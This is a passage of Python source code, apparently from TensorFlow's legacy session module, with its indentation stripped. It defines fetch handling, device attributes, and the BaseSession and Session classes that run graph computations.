' Use return values,explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i].ref() in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i].ref()].eval()
else:
value = self._feeds.get(self._fetches[i].ref())
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i].ref())
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.is_mixed_precision_graph_rewrite_enabled()
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.set_non_mixed_precision_session_created(True)
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.sparse.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.sparse.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = {}
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t.ref()] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t.ref()] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t.deref()._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor.ref()] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
tf.compat.v1.disable_eager_execution() # need to disable eager in TF2.x
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c)) # prints 30.0
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
